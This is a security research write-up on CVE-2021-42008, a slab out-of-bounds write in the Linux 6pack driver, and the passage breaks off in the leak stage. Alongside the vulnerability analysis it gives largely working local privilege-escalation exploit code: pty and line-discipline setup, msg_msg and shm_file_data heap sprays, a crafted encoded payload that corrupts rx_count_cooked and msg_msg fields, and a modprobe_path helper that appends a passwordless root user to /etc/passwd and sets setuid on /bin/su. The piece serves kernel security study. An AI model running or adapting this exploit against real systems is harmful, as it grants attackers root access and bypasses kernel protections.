[CVE-2021-42008] Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access. In this article, after analyzing the vulnerability, we will exploit it using the techniques FizzBuzz101 and me presented in our recent articles Fire Of Salvation and Wall Of Perdition, bypassing all modern kernel protections, then, we will evaluate other approaches to perform privilege escalation.

Overview

6pack is a transmission protocol for data exchange between a PC and a TNC (Terminal Node Controller) over a serial line. It is used as an alternative to the KISS protocol for networking over AX.25. AX.25 is a data link layer protocol extensively used on amateur packet radio networks (and interestingly by some satellites, for example 3CAT2).

The vulnerability we are going to exploit, was introduced by commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 with the introduction of the 6pack driver back in 2005. It was found by Syzbot and recently fixed by commit 19d1532a187669ce86d5a2696eb7275310070793. Every kernel version before 5.13.13 that has not been patched, is affected.

As we mentioned in the introduction, the vulnerability is caused by a missing size validation check in the decode_data() function. A malicious input received over the sixpack channel from a process with CAP_NET_ADMIN capability, can cause the decode_data() function to be called multiple times by sixpack_decode().

The malicious input is subsequently decoded and stored into a buffer, cooked_buf, in the sixpack structure. The variable rx_count_cooked is used as index in cooked_buf, it basically determines where a decoded byte must be written.

The problem is that if decode_data() is called multiple times, the rx_count_cooked variable is incremented over and over, until it exceeds the size of cooked_buf, which can contain a maximum of 400 bytes. This can result in a a Slab-Out-Of-Bounds Write vulnerability, which if properly exploited, can lead to root access.

To exploit the vulnerability, we are going to target one of the latest Debian 11 versions. It can be downloaded from here. The exploit is designed and tested for kernel 5.10.0-8-amd64. All modern protections, such as KASLR, SMEP, SMAP, PTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, CONFIG_HARDENED_USERCOPY etc. are enabled.

Analyzing The Vulnerable Driver

In modern Linux distributions, 6pack is usually compiled as a Loadable Kernel Module. The module can be loaded into kernel by setting the line discipline of a tty to N_6PACK. To do so, we can simply create a ptmx/pts pair, respectively the master side and the slave side of a pty and set the line discipline of the slave to N_6PACK:

#define N_6PACK 7

int open_ptmx(void)
{
    int ptmx;

    ptmx = getpt();

    if (ptmx < 0)
    {
        perror("[X] open_ptmx()");
        exit(1);
    }

    grantpt(ptmx);
    unlockpt(ptmx);

    return ptmx;
}


int open_pts(int fd)
{
    int pts;

    pts = open(ptsname(fd), 0, 0);

    if (pts < 0)
    {
        perror("[X] open_pts()");
        exit(1);
    }

    return pts;
}


void set_line_discipline(int fd, int ldisc)
{
    if (ioctl(fd, TIOCSETD, &ldisc) < 0) // [2]
    {
        perror("[X] ioctl() TIOCSETD");
        exit(1);
    }
}


int init_sixpack()
{
    int ptmx, pts;

    ptmx = open_ptmx();
    pts = open_pts(ptmx);

    set_line_discipline(pts, N_6PACK); // [1]

    return ptmx;
}

After opening a ptmx and the respective slave side, we set the line discipline of the pts to N_6PACK [1] using the function set_line_discipline() [2].

Line discipline, also known as LDISC, acts as an intermediate level between a character device and a pseudo terminal (or real hardware), determining the semantics associated with the device.

For example, the line discipline is responsible for the association of a special character like ^C entered by the user in a terminal pressing CTRL + C, to a specific signal, SIGINT in this case. To learn more about tty, pty, ptmx/pts and ldsc I recommend you to read The TTY demystified.

Once we set the pts line discipline to N_6PACK, the 6pack driver is initialized by sixpack_init_driver():

static int __init sixpack_init_driver(void)
{
    int status;

    printk(msg_banner);

    /* Register the provided line protocol discipline */
    if ((status = tty_register_ldisc(N_6PACK, &sp_ldisc)) != 0) // [1]
        printk(msg_regfail, status);

    return status;
}

and tty_register_ldisc() is called to register the new line discipline [1]. The second argument, sp_ldisc, is defined as:

static struct tty_ldisc_ops sp_ldisc = {
    .owner        = THIS_MODULE,
    .magic        = TTY_LDISC_MAGIC,
    .name         = "6pack",
    .open         = sixpack_open,
    .close        = sixpack_close,
    .ioctl        = sixpack_ioctl,
    .receive_buf  = sixpack_receive_buf,
    .write_wakeup = sixpack_write_wakeup,
};

Afterwards the sixpack channel is opened by sixpack_open():

static int sixpack_open(struct tty_struct *tty)
{
    char *rbuff = NULL, *xbuff = NULL;
    struct net_device *dev;
    struct sixpack *sp;
    unsigned long len;
    int err = 0;

    if (!capable(CAP_NET_ADMIN)) // [1]
        return -EPERM;
    if (tty->ops->write == NULL)
        return -EOPNOTSUPP;

    dev = alloc_netdev(sizeof(struct sixpack), "sp%d", NET_NAME_UNKNOWN,
                sp_setup); // [2]
    if (!dev) {
        err = -ENOMEM;
        goto out;
    }

    sp = netdev_priv(dev); // [3]
    sp->dev = dev;

    [...]

    sp->status      = 1; // [4]

    [...]

    timer_setup(&sp->tx_t, sp_xmit_on_air, 0);
    timer_setup(&sp->resync_t, resync_tnc, 0); // [5]

    [...]

    tty->disc_data = sp; // [6]
    tty->receive_room = 65536;

    /* Now we're ready to register. */
    err = register_netdev(dev);
    if (err)
        goto out_free;

    tnc_init(sp); // [7]

    return 0;

    [...]
}

From the source code above, we can see that only a process with CAP_NET_ADMIN capability is allowed to interact with the 6pack driver [1]. Fortunately, this makes the vulnerability not so easily exploitable in the wild.

Then, a net device is allocated using alloc_netdev() which is a macro for alloc_netdev_mqs() [2]:

[...]

alloc_size = sizeof(struct net_device); // [2.1] 0x940 bytes
if (sizeof_priv) {
    /* ensure 32-byte alignment of private area */
    alloc_size = ALIGN(alloc_size, NETDEV_ALIGN);
    alloc_size += sizeof_priv; // [2.2] 0x270 bytes
}
/* ensure 32-byte alignment of whole construct */
alloc_size += NETDEV_ALIGN - 1;

p = kvzalloc(alloc_size, GFP_KERNEL | __GFP_RETRY_MAYFAIL); // [2.3]
if (!p)
    return NULL;

dev = PTR_ALIGN(p, NETDEV_ALIGN);

[...]

As we can see from the alloc_netdev_mqs() source code, first, it calculates the size of a net_device structure, 0x940 bytes in our case, [2.1] and then it adds the value of sizeof_priv to it, which corresponds to the size of a sixpack structure, 0x270 bytes in our case. [2.2] After alignment, this will result in an allocation of 0xbcf bytes, that will end up in kmalloc-4k. [2.3]

Back to sixpack_open(), right after the call to alloc_netdev(), netdev_priv() is called: it sets the location of the sixpack structure inside the private data region of the previously allocated net device [3].

Finally, after setting the status field of the sixpack structure to 1 [4] and initializing two timers (the function called when the second timer expires, resync_tnc(), will be extremely important in the exploitation phase) [5], the tty line is linked to the sixpack channel [6], the net device is registered, and tnc_init() is called [7]:

static inline int tnc_init(struct sixpack *sp)
{
    [...]

    mod_timer(&sp->resync_t, jiffies + SIXP_RESYNC_TIMEOUT); // [1]

    return 0;
}

Among other things, tnc_init() sets the expiration time of the sp->resync_t timer to jiffies + SIXP_RESYNC_TIMEOUT [1].

In the Linux Kernel, jiffies is a global variable that stores the number of ticks occurred since the system boot-up. The value of this variable is incremented by one for each timer interrupt. In one second, there are HZ ticks (the value of HZ is determined by CONFIG_HZ).

Since we know that HZ = number of ticks/sec and jiffies = number of ticks, we can simply convert jiffies to seconds sec = jiffies/HZ and seconds to jiffies jiffies = sec*HZ.

This is exactly what the Linux Kernel does to determine when a timer expires. For example, a timer that expires in 10 seconds from now can be represented in jiffies using jiffies + (10*HZ).

In our case, the timer is set to jiffies + SIXP_RESYNC_TIMEOUT. SIXP_RESYNC_TIMEOUT is equal to 5*HZ. This means that once the sixpack channel is initialized, the timer will expire after 5 seconds, triggering a call to resync_tnc(). We will analyze this function during the exploitation phase.

Reaching The Vulnerable Function

Now that we can communicate with the sixpack driver, when we write to the ptmx, sixpack_receive_buf() is called, which in turn calls sixpack_decode():

static void sixpack_decode(struct sixpack *sp, const unsigned char *pre_rbuff, int count)
{
    unsigned char inbyte;
    int count1;

    for (count1 = 0; count1 < count; count1++) {
        inbyte = pre_rbuff[count1]; // [1]
        if (inbyte == SIXP_FOUND_TNC) {
            tnc_set_sync_state(sp, TNC_IN_SYNC);
            del_timer(&sp->resync_t);
        }
        if ((inbyte & SIXP_PRIO_CMD_MASK) != 0) // [2]
            decode_prio_command(sp, inbyte);
        else if ((inbyte & SIXP_STD_CMD_MASK) != 0) // [3]
            decode_std_command(sp, inbyte);
        else if ((sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK) // [4]
            decode_data(sp, inbyte);
    }
}

The various macros are defined in 6pack.c:

#define SIXP_FOUND_TNC      0xe9
#define SIXP_PRIO_CMD_MASK  0x80
#define SIXP_PRIO_DATA_MASK 0x38
#define SIXP_RX_DCD_MASK    0x18
#define SIXP_DCD_MASK       0x08

sixpack_decode() will loop through the buffer we sent over the sixpack channel, now stored in pre_rbuff [1], and based on the value of each byte (inbyte), it will take different paths.

To reach the vulnerable function, decode_data(), we must force sixpack_decode() to take the last path, [4] and to do so, we need to satisfy multiple conditions:

A. inbyte & SIXP_PRIO_CMD_MASK must be zero, otherwise decode_prio_command() will be called instead of decode_data() [2].

B. inbyte & SIXP_STD_CMD_MASK must be zero, otherwise decode_std_command() will be called instead of decode_data() [3].

C. sp->status & SIXP_RX_DCD_MASK must be equal to SIXP_RX_DCD_MASK [4].

We control the value of each byte in our buffer, the first two conditions can be easily satisfied. The most complex one to satisfy is C.

When a sixpack structure is initialized by sixpack_open(), the status variable is set to 1. Although we have no direct control over this variable, we can still indirectly modify it by taking the decode_prio_command() path [2]:

static void decode_prio_command(struct sixpack *sp, unsigned char cmd)
{
    int actual;

    if ((cmd & SIXP_PRIO_DATA_MASK) != 0) { // [1]

        if (((sp->status & SIXP_DCD_MASK) == 0) &&
            ((cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK)) { // [2]
                if (sp->status != 1)
                    printk(KERN_DEBUG "6pack: protocol violation\n");
                else
                    sp->status = 0;
                cmd &= ~SIXP_RX_DCD_MASK; // [3]
        }
        sp->status = cmd & SIXP_PRIO_DATA_MASK; // [4]
    } else { /* output watchdog char if idle */

            [...]

    }

    [...]
}

When decode_prio_command() is called, if we satisfy the first check [1], we can control sp->status exploiting the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4], which is exactly what we need since we control the value of cmd.

Easy, right? No. We have a problem. If the second check is satisfied [2], the SIXP_RX_DCD_MASK bits are zeroed out from our cmd variable by the line cmd &= ~SIXP_RX_DCD_MASK [3], but since we need to satisfy condition C to reach the vulnerable function decode_data(), the second part of the second check (cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK [2] will inevitably be satisfied and the same applies to the first part of the check (sp->status & SIXP_DCD_MASK) == 0 since when decode_prio_command() is called for the first time, sp->status is equal to 1.

Fortunately, we can easily work around the problem by calling decode_prio_command() twice: The first time, we set sp->status to a certain value, such that when decode_prio_command() is called again, the first part of the second check (sp->status & SIXP_DCD_MASK) == 0 [2] is not satisfied. Then, calling decode_prio_command() again with a specific value as input, we will be able to skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to a value that can satisfy condition C.

The following python script will compute the correct bytes for us:

print("[*] First call to decode_prio_command():")
for byte in range(0x100):
    x = byte
    if (x & SIXP_PRIO_CMD_MASK) != 0: # To call decode_prio_command()
        if (x & SIXP_PRIO_DATA_MASK) != 0: # [1] in decode_prio_command()
            if (x & SIXP_RX_DCD_MASK) != SIXP_RX_DCD_MASK: # [2] in decode_prio_command()
                x = x & SIXP_PRIO_DATA_MASK # [3] in decode_prio_command()
                print(f"Input: {hex(byte)} => sp->status = {hex(x)}\n")
                break

print("[*] Second call to decode_prio_command():")
for byte in range(0x100):
    x = byte
    if (x & SIXP_PRIO_CMD_MASK) != 0: # To call decode_prio_command()
        if (x & SIXP_PRIO_DATA_MASK) != 0: # [1] in decode_prio_command()
            if (x & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK: # To reach decode_data()
                x = x & SIXP_PRIO_DATA_MASK # [3] in decode_prio_command()
                print(f"Input: {hex(byte)} => sp->status = {hex(x)}")
                break

Executing the script above we will get the following result:

[*] First call to decode_prio_command():
Input: 0x88 => s->status = 0x8

[*] Second call to decode_prio_command():
Input: 0x98 => s->status = 0x18

It means that if decode_prio_command() is called the first time using 0x88 as input, sp->status will be set to 0x8, then, calling the function again using 0x98 as input, the second check will not be satisfied [2] because sp->status will be equal to 8 and (8 & SIXP_DCD_MASK) != 0, and we will be able skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to 0x18 exploiting the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4].

At this point we can satisfy condition C, (sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK, in sixpack_decode(), and reach the vulnerable function decode_data(). Let’s proceed examining its source code:

static void decode_data(struct sixpack *sp, unsigned char inbyte)
{
    unsigned char *buf;

    if (sp->rx_count != 3) {
        sp->raw_buf[sp->rx_count++] = inbyte; // [1]

        return;
    }

    // [2]
    buf = sp->raw_buf; 
    sp->cooked_buf[sp->rx_count_cooked++] =
        buf[0] | ((buf[1] << 2) & 0xc0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[1] & 0x0f) | ((buf[2] << 2) & 0xf0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[2] & 0x03) | (inbyte << 2);
    sp->rx_count = 0;
}

For our discussion, we also need to take into account the following fields of the sixpack structure:

struct sixpack {

    [...]

    unsigned char       raw_buf[4];
    unsigned char       cooked_buf[400];

    unsigned int        rx_count;
    unsigned int        rx_count_cooked;

    [...]

    unsigned char       status;

    [...]
};

Every time decode_data() is called, one byte is copied from our buffer to sp->raw_buf [1]. When sp->raw_buf contains three bytes and decode_data() is called again, these three bytes are decoded and copied from sp->raw_buf to another buffer, sp->cooked_buf [2]. As we can see from the sixpack structure above, this buffer can contain a maximum of 400 bytes. The variable sp->rx_count_cooked is used as index in sp->cooked_buf and it is incremented after each byte is written into it.

From an attacker prospective, knowing that your payload will pass through this function is not fun at all. Luckily we can reuse some parts of the encode_sixpack() function in our exploit to encode the malicious payload, this way, once received by sixpack_decode() it will be decoded by decode_data() and we will be able to control values in memory.

Here is the encode_sixpack() part we are interested in:

static int encode_sixpack(unsigned char *tx_buf, unsigned char *tx_buf_raw,
    int length, unsigned char tx_delay)
{
    [...]

    for (count = 0; count <= length; count++) {
        if ((count % 3) == 0) {
            tx_buf_raw[raw_count++] = (buf[count] & 0x3f);
            tx_buf_raw[raw_count] = ((buf[count] >> 2) & 0x30);
        } else if ((count % 3) == 1) {
            tx_buf_raw[raw_count++] |= (buf[count] & 0x0f);
            tx_buf_raw[raw_count] =  ((buf[count] >> 2) & 0x3c);
        } else {
            tx_buf_raw[raw_count++] |= (buf[count] & 0x03);
            tx_buf_raw[raw_count++] = (buf[count] >> 2);
        }
    }

    [...]

    return raw_count;
}

Now that we know how to reach the vulnerable function, we can finally start planning our exploit.

Exploitation Plan

The first thing to consider is the layout of the sixpack structure in memory. Let’s take a look to its source code again:

struct sixpack {

    [...]

    unsigned char       raw_buf[4];
    unsigned char       cooked_buf[400]; // [1]

    unsigned int        rx_count; // [2]
    unsigned int        rx_count_cooked; // [3]

    [...]
};

As we can see, if we manage to overflow the cooked_buf array [1], we will inevitably overwrite the rx_count variable [2] and the rx_count_cooked variable [3] in memory. Here is a visual representation:

We know that rx_count_cooked is used as index in cooked_buf by decode_data(), therefore if we do the math correctly, we can use the overflow to set it to a large value, this way we should be able to trick decode_data() into continuing to write the decoded payload in the next object in memory.

Now, assuming we can achieve this goal, we need an object that we can spray in kmalloc-4k, and once corrupted by our Out-Of-Bounds Write can give us arbitrary read and arbitrary write. At this point, if you have read my latest article, you already know that msg_msg is exactly what we need:

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts; // [1]
    struct msg_msgseg *next; // [2]
    void *security;
    /* the actual message follows immediately */
};

In our recent articles, Fire Of Salvation and Wall Of Perdition, FizzBuzz101 and me, have extensively discussed how to utilize msg_msg objects to achieve arbitrary read and arbitrary write.

Before continuing, I recommend you to read these articles to better understand how this object can be exploited. I will continue assuming you already know how msg_msg objects can be utilized in kernel exploitation.

If we manage to get a msg_msg object allocated next to the sixpack structure, and the respective segment allocated in kmalloc-32, we can corrupt the m_ts field of the message [1] (which determines its size) with our Out-Of-Bounds Write primitive, setting it to a large value. This way, using msgrcv(), we will be able to obtain a Out-Of-Bounds Read primitive in kmalloc-32, get an information leak and bypass KASLR.

Similarly, to achieve arbitrary write, we can spray many msg_msg objects in kmalloc-4k and their respective segments in kmalloc-32, then for each object we can suspend the call to copy_from_user() in load_msg() using userfaultfd (there are alternatives to userfaultfd, we will discuss them in the Conclusion section). Afterwards, once one of these messages is allocated right after our sixpack structure, we corrupt its next pointer [2], setting it to the address where we want to write.

In our exploit, we will target modprobe_path, but there are many other valid targets, for example the current task’s cred structure.

Once the copy_from_user() calls will be released, we will able to replace the modprobe_path string with the path of a malicious binary, and trick the kernel into executing the program that will give us root privileges.

At this point, with this plan in mind, we are ready to start writing our exploit!

The Exploit

First of all we need to do some calculations to get the distance between sp->cooked_buf and sp->rx_count_cooked, and the distance between sp->cooked_buf and the next object in memory. In our case, the address of sp->rx_count_cooked corresponds to sp->cooked_buf[0x194] and the address of the next object in memory corresponds to sp->cooked_buf[0x688].

Since we know that sp->rx_count_cooked is used as index inside sp->cooked_buf, if we want to write to the next object in memory, we need to set its value to x, where x >= 0x688.

Again: easy, right? No. We need to consider the effect of GCC optimizations on the vulnerable function decode_data():

static void decode_data(struct sixpack *sp, unsigned char inbyte)
{
    unsigned char *buf;

    [...]

    buf = sp->raw_buf;
    sp->cooked_buf[sp->rx_count_cooked++] =
        buf[0] | ((buf[1] << 2) & 0xc0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[1] & 0x0f) | ((buf[2] << 2) & 0xf0);
    sp->cooked_buf[sp->rx_count_cooked++] =
        (buf[2] & 0x03) | (inbyte << 2);
    sp->rx_count = 0;
}

decode_data + 00:        nop    DWORD PTR [rax+rax*1+0x0]
decode_data + 05:        movzx  r8d,BYTE PTR [rdi+0x35] // r8d = sp->raw_buf[1]
decode_data + 10: [1]    mov    eax,DWORD PTR [rdi+0x1cc] // eax = sp->rx_count_cooked
decode_data + 16:        shl    esi,0x2
decode_data + 19:        lea    edx,[r8*4+0x0]
decode_data + 27: [2]    mov    rcx,rax // rcx = sp->rx_count_cooked
decode_data + 30:        lea    r9d,[rax+0x1] // r9d = sp->rx_count_cooked + 1
decode_data + 34:        and    r8d,0xf
decode_data + 38:        and    edx,0xffffffc0
decode_data + 41:        or     dl,BYTE PTR [rdi+0x34] // dl or sp->raw_buf[0]
decode_data + 44: [3]    mov    BYTE PTR [rdi+rax*1+0x38],dl // Write first decoded byte in sp->cooked_buf
decode_data + 48:        movzx  edx,BYTE PTR [rdi+0x36] // eax = sp->raw_buf[2]
decode_data + 52:        lea    eax,[rdx*4+0x0]
decode_data + 59:        and    edx,0x3
decode_data + 62:        and    eax,0xfffffff0
decode_data + 65:        or     esi,edx
decode_data + 67:        or     eax,r8d
decode_data + 70: [4]    mov    BYTE PTR [rdi+r9*1+0x38],al // Write second decoded byte in sp->cooked_buf
decode_data + 75:        lea    eax,[rcx+0x3] // eax = sp->rx_count_cooked + 3
decode_data + 78: [5]    mov    DWORD PTR [rdi+0x1cc],eax //  sp->rx_count_cooked = sp->rx_count_cooked + 3
decode_data + 84:        lea    eax,[rcx+0x2] // eax = sp->rx_count_cooked + 2
decode_data + 87: [6]    mov    BYTE PTR [rdi+rax*1+0x38],sil // Write third decoded byte in sp->cooked_buf
decode_data + 92:        mov    DWORD PTR [rdi+0x1c8],0x0 // sp->rx_count = 0
decode_data + 102:       ret

The first important thing to note is that predictably, when decode_data() is called, and sp->raw_buf contains 3 bytes, GCC optimized the access to sp->rx_count_cooked, so instead of accessing its value multiple times during the write procedure, it is stored in EAX [1] and then it moved it to RCX [2] at the beginning of the function.

The second important thing is that instead of three consecutive write operations in sp->cooked_buf, before writing the third decoded byte [6], the value of sp->rx_count_cooked is updated with its previously stored [1] [2] value + 3 [5].

This optimization makes things harder, because if we manage to overwrite the first two bytes of sp->rx_count_cooked thanks to the instructions [3] and [4], before overwriting the third byte [6], its value will be updated by instruction [5].

It means that we need to try to use the third write operation [6] to overwrite the second byte of sp->rx_count_cooked that corresponds to sp->cooked_buf[0x195], for example making it 0x06XX instead of 0x01XX.

Since decode_data() is writing 3 bytes at time starting from index 0 into sp->cooked_buf, each time decode_data() is called, the third byte will be written at index 0x2, 0x5, 0x8, …, 0x191, 0x194 and so on. Basically when sp->rx_count_cooked is 0x192 and decode_data() is called again, the third write operation will be performed over sp->cooked_buf[0x194], but with the third decoded byte we need to overwrite sp->cooked_buf[0x195]! Oh, lovely GCC optimizations…

The problem can be solved misaligning the writing frame by setting the first byte of sp->rx_count_cooked to 0x90, so it will become 0x190. This way, after two more calls to decode\_data() the third write operation will be performed over sp->cooked_buf[0x195].

Each time decode_data() is called, we basically have a pattern of three operations:

First, when sp->rx_count_cooked is equal to 0x192 and decode_data() is called again, it writes the first two bytes with instruction [3] and [4] respectively at sp->cooked_buf[0x192] and sp->cooked_buf[0x193].
Then instruction [5] updates sp->rx_count_cooked with its previously stored value + 3: 0x192 + 3: 0x195.
And finally the third write operation [6] overwrites the first byte of sp->rx_count_cooked which corresponds to sp->cooked_buf[0x194], making it 0x190.

Here is a visual representation:

Now sp->rx_count_cooked is equal to 0x190, and we successfully misaligned the writing frame. When decode_data() is called again, we have the same pattern of operations:

Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x190] and sp->cooked_buf[0x191])
Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x190 + 3: 0x193)
Write the third byte (this time at sp->cooked_buf[0x192]):

And again, a new call to decode_data() will finally set sp->rx_count_cooked to 0x696. The pattern is always the same:

Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x193] and sp->cooked_buf[0x194])
Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x193 + 3: 0x196)
Write the third byte (this time at sp->cooked_buf[0x195]):

This will trick decode_data() into continuing to write the payload 0x0e bytes inside the next object in memory. At this point we can start writing our exploit:

void prepare_exploit()
{
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/asd");
    system("chmod +x /tmp/asd");
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'chmod +s /bin/su' >> /tmp/x"); // Needed for busybox, just in case
    system("echo 'echo \"pwn::0:0:pwn:/root:/bin/sh\" >> /etc/passwd' >> /tmp/x"); // [4]
    system("chmod +x /tmp/x");

    memcpy(buff2 + 0xfc8, "/tmp/x\00", 7);
}


void assign_to_core(int core_id)
{
    cpu_set_t mask;
    pid_t pid;

    pid = getpid();

    printf("[*] Assigning process %d to core %d\n", pid, core_id);

    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);

    if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0) // [2]
    {
        perror("[X] sched_setaffinity()");
        exit(1);
    }

    print_affinity();
}

[...]

assign_to_core(0); // [1]
prepare_exploit(); // [3]

[...]

Since we are working in a SMD environment and with the SLUB allocator active slabs are managed per-cpu (see kmem_cache_cpu), we need to make sure to operate always on the same processor to maximize the success rate of our exploit. We can do this by assigning the current process to core 0 [1] using sched_setaffinity() [2] which is usable by unprivileged users.

Then we call prepare_exploit() to prepare everything we need to exploit modprobe [3] (Check References to learn more about this technique or read my Hotrod writeup).

As you can see once executed by the kernel, the program will add a new user with root privileges [4].

void alloc_msg_queue_A(int id)
{
    if ((qid_A[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("[X] msgget");
        exit(1);
    }
}


void send_msg(int qid, int size, int type, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = type;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("[X] msgsnd");
        exit(1);
    }
}


void *recv_msg(int qid, size_t size, int type)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, type, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) < 0)
    {
        perror("[X] msgrcv");
        return NULL;
    }

    return memdump;
}


void alloc_shm(int i)
{
    shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);

    if (shmid[i]  < 0)
    {
        perror("[X] shmget fail");
        exit(1);
    }

    shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);

    if (shmaddr[i] < 0)
    {
        perror("[X] shmat");
        exit(1);
    }
}

[...]

puts("[*] Spraying shm_file_data in kmalloc-32...");
for (int i = 0; i < 100; i++)
    alloc_shm(shmid[i]); // [1]

puts("[*] Spraying messages in kmalloc-4k...");
for (int i = 0; i < N_MSG; i++)
    alloc_msg_queue_A(i); // [2]

for (int i = 0; i < N_MSG; i++)
    send_msg(qid_A[i], 0x1018, 1, 'A' + i); // [3]

recv_msg(qid_A[0], 0x1018, 0); // [4]
ptmx = init_sixpack(); // [5]

[...]

We can continue spraying many shm_file_data structures in kmalloc-32:

struct shm_file_data {
    int id;
    struct ipc_namespace *ns;
    struct file *file;
    const struct vm_operations_struct *vm_ops;
};

This can be done using shmget() to allocate a shared memory segment and shmat() to attach it to the address space of the calling process [1]. This, later on, will allow us to leak the init_ipc_ns symbol, located in the kernel data section, calculate the kernel base address, and bypass KASLR.

Afterwards, we allocate N_MSG (in this case N_MSG is equal to 6) message queues [2] and then for each queue we send a message of 0x1018 bytes (0xfe8 bytes for message body, and 0x30 for message header) using send_msg() [3], a msgsnd() wrapper. Each iteration will allocate a message in kmalloc-4k and a segment in kmalloc-32.

PS: Here I only used 6 messages because the testing environment was virtually noiseless. On other systems you may want to use more message queues and spray more messages to saturate kmalloc-4k partial slabs first.

Then we use recv_msg(), a msgrcv() wrapper, to read a message a create a hole in the kernel heap [4]. At this point we can finally initialize the sixpack channel as we have seen in the first section. [5] This will allocate a net_device structure in kmalloc-4k and a sixpack structure inside its private data region.

All this will create the following situation in memory, where the sixpack structure is followed by one of the messages. This message contains a pointer to its respective segment in kmalloc-32:

It is important to note that we don’t know which queue the message allocated after the sixpack structure belongs to, so I identified the queue with QID #X.

We are finally ready to send our malicious payload over the sixpack channel:

uint8_t *sixpack_encode(uint8_t *src)
{
    uint8_t *dest = (uint8_t *)calloc(1, 0x3000);
    uint32_t raw_count = 2; // [8]

    for (int count = 0; count <= PAGE_SIZE; count++)
    {
        if ((count % 3) == 0)
        {
            dest[raw_count++] = (src[count] & 0x3f);
            dest[raw_count] = ((src[count] >> 2) & 0x30);
        }
        else if ((count % 3) == 1)
        {
            dest[raw_count++] |= (src[count] & 0x0f);
            dest[raw_count] =    ((src[count] >> 2) & 0x3c);
        }
        else
        {
            dest[raw_count++] |= (src[count] & 0x03);
            dest[raw_count++] = (src[count] >> 2);
        }
    }

    return dest;
}


uint8_t *generate_payload(uint64_t target)
{
    uint8_t *encoded;

    memset(buff, 0, PAGE_SIZE);

    // sp->rx_count_cooked = 0x190
    buff[0x194] = 0x90; // [2]

    // sp->rx_count_cooked = 0x696
    buff[0x19a] = 0x06; // [3]

    // fix two upper bytes of msg_msg.m_list.prev
    buff[0x19b] = 0xff; // [4]
    buff[0x19c] = 0xff;

    // msg_msg.m_ts = 0x1100
    buff[0x1a6] = 0x11; // [5]

    // msg_msg.next = target
    if (target) // [6]
        for (int i = 0; i < sizeof(uint64_t); i++)
            buff[0x1ad + i] = (target >> (8 * i)) & 0xff;

    encoded = sixpack_encode(buff);

    // sp->status = 0x18 (to reach decode_data())
    encoded[0] = 0x88; // [7]
    encoded[1] = 0x98;

    return encoded;
}

[...]

payload = generate_payload(0); // [1]
write(ptmx, payload, LEAK_PAYLOAD_SIZE); // [9]

[...]

We generate and encode our malicious payload calling generate_paylaod() [1]. As we have seen in the previous paragraphs, we misalign the writing frame of the decode_data() function by setting sp->rx_count_cooked to 0x190 [2].

We overwrite the second byte of sp->rx_count_cooked with 0x6, making it 0x696 [3]. From this point on, decode_data() will continue writing data at sp->cooked_buf[0x696] and by doing so it will inevitably corrupt the two upper bytes of the msg_msg.m_list.prev pointer. Since we know that the two upper bytes of a heap pointer in kernel space are always 0xffff, we can easily fix the issue [4].

Then we set msg_msg.m_ts to 0x1100 [5], this will allow us to obtain an Out-Of-Bounds Read primitive calling recv_msg(). For now we don’t need to overwrite msg_msg.next [6], so we can directly encode our buffer [7], and set the first two bytes of the payload respectively to 0x88, and 0x98, to reach the vulnerable function.

Since we are skipping the first two bytes, we set sp->rx_count to 2 in sixpack_encode() [8].

Once we send our malicious payload over the sixpack channel [9], it will be decoded by sixpack_decode() resulting in the following situation in memory:

We have successfully overwritten sp->rx_count_cooked with 0x696 exploiting the buffer overflow in sp->cooked_buf, and tricked decode_data() into writing our malicious payload at sp->cooked_buf[0x696].

By doing so, we successfully overwritten the m_ts field of the message. Here is the result of our Out-Of-Bounds Write primitive showed in GDB:

We can proceed exploiting the Out-Of-Bounds Read:

void close_queue(int qid)
{
    if (msgctl(qid, IPC_RMID, NULL) < 0)
    {
        perror("[X] msgctl()");
        exit(1);
    }
}


int find_message_queue(uint16_t tag)
{
    switch (tag)
    {
        case 0x4141: return 0;
        case 0x4242: return 1;
        case 0x4343: return 2;
        case 0x4444: return 3;
        case 0x4545: return 4;
        case 0x4646: return 5;

        default: return -1;
    }
}


void leak_pointer(void)
{
    uint64_t *leak;

    for (int id = 0; id < N_MSG; id ++)
    {
        leak = (uint64_t *)recv_msg(qid_A[id], 0x1100, 0);

        if (leak == NULL)
            continue;

        for (int i = 0; i < 0x220; i++)
        {
            if ((leak[i] & 0xffff) == INIT_IPC_NS) // [2]
            {
                init_ipc_ns = leak[i];
                valid_qid = find_message_queue((uint16_t)leak[1]); // [3]
